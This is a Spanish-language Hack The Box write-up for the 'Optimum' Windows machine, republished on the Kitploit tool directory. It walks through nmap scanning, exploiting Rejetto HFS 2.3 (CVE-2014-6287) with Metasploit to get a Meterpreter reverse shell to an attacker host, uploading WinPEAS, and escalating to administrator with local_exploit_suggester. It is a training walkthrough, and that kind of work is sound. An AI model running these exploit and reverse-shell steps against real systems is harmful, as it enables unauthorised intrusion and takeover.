Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Optimum — Writeup de la máquina Optimum de Hack The Box. Este walkthrough cubre la explotación de Rejetto HttpFileServer 2.3 (CVE-2014-6287) para obtener acceso inicial, seguido de la escalada de privilegios en un host Windows mediante técnicas de enumeración y herramientas de post-explotación. | Kitploit
Herramientas/GitHubGitHub/r3fr4kt/optimum
Escalada de PrivilegiosReconocimientoEscáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPost-ExplotaciónPruebas de PenetraciónAprendizaje y Educación
GitHub
hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Writeup de la máquina Optimum de Hack The Box. Este walkthrough cubre la explotación de Rejetto HttpFileServer 2.3 (CVE-2014-6287) para obtener acceso inicial, seguido de la escalada de privilegios en un host Windows mediante técnicas de enumeración y herramientas de post-explotación.

r3fr4kt/optimum

Optimum

Ver Repositorio
Compartir

Optimum


Optimum – Writeup de Hack The Box

Resumen

En esta máquina, el objetivo es obtener acceso inicial a un host Windows explotando un servicio web vulnerable y luego escalar privilegios para obtener la bandera de administrador.

La ruta de ataque involucró:

  • Enumeración de servicios
  • Explotación de Rejetto HTTP File Server 2.3
  • Acceso inicial mediante Metasploit
  • Escalada de privilegios usando WinPEAS y módulos de post-explotación de Metasploit

Reconocimiento

Comenzamos con un escaneo completo de puertos TCP para identificar servicios expuestos.

root@kitploit:~
nmap -Pn -n -p- --min-rate 5000 -T4 <IP_OBJETIVO>

El escaneo revela el puerto 80 abierto.

A continuación, realizamos un escaneo de servicio y versión.

root@kitploit:~
nmap -p80 -sSCV --min-rate 5000 -T4 <IP_OBJETIVO>

El resultado identifica el siguiente servicio:

root@kitploit:~
HttpFileServer 2.3

Este servicio corresponde a Rejetto HTTP File Server, un servidor web ligero para compartir archivos.


Identificación de Vulnerabilidades

Después de investigar la versión detectada, descubrimos una vulnerabilidad conocida:

root@kitploit:~
CVE-2014-6287

Esta vulnerabilidad permite ejecución remota de código debido a una sanitización incorrecta de las entradas.


Explotación

Para explotar la vulnerabilidad, usamos Metasploit.

Iniciamos Metasploit:

root@kitploit:~
msfconsole -q

Buscamos el módulo adecuado:

root@kitploit:~
search rejetto

Cargamos el módulo de explotación:

root@kitploit:~
use exploit/windows/http/rejetto_hfs_exec

Configuramos las opciones requeridas:

root@kitploit:~
set RHOSTS <IP_OBJETIVO>
set RPORT <PUERTO_OBJETIVO>
set LHOST <IP_ATACANTE>
set LPORT <PUERTO_ATACANTE>
run

Una vez ejecutado, el exploit proporciona una sesión de Meterpreter en la máquina objetivo.


Acceso Inicial

Con la sesión de Meterpreter obtenida, navegamos por el sistema de archivos para recuperar la bandera de usuario.

root@kitploit:~
cd
cat user.txt
whoami

La salida del comando muestra que estamos conectados como:

root@kitploit:~
kostas

Dado que este usuario no tiene privilegios administrativos, procedemos con la escalada de privilegios.


Enumeración para Escalada de Privilegios

Para identificar posibles vectores de escalada de privilegios, subimos WinPEAS, una conocida herramienta de enumeración para escalada de privilegios en Windows.

root@kitploit:~
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe

Luego lo ejecutamos:

root@kitploit:~
shell
.\wp.exe

La salida revela información útil, incluyendo credenciales asociadas al usuario kostas.


Escalada de Privilegios

Después de revisar los posibles vectores de escalada, usamos el módulo de Metasploit:

root@kitploit:~
local_exploit_suggester

Cargamos el módulo:

root@kitploit:~
use post/multi/recon/local_exploit_suggester

Configuramos la sesión:

root@kitploit:~
set SESSION <NUMERO_DE_SESION>
run

Este módulo sugiere posibles exploits locales que se pueden usar para escalar privilegios.

Después de escalar privilegios exitosamente, obtenemos una shell con derechos administrativos.

Verificación:

root@kitploit:~
shell
whoami

Acceso de Administrador

Una vez que se obtienen los privilegios de administrador, navegamos al directorio del Administrador para recuperar la bandera root.

root@kitploit:~
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt

Conclusiones Clave

Esta máquina demuestra varios conceptos importantes de pruebas de penetración:

  • La enumeración adecuada de servicios es crítica para identificar software vulnerable.
  • Vulnerabilidades públicas conocidas como CVE-2014-6287 pueden llevar a una ejecución remota de código inmediata.
  • Herramientas como WinPEAS ayudan a identificar oportunidades de escalada de privilegios en entornos Windows.
  • Los módulos de post-explotación de Metasploit pueden acelerar el proceso de escalada de privilegios.
Descargar herramienta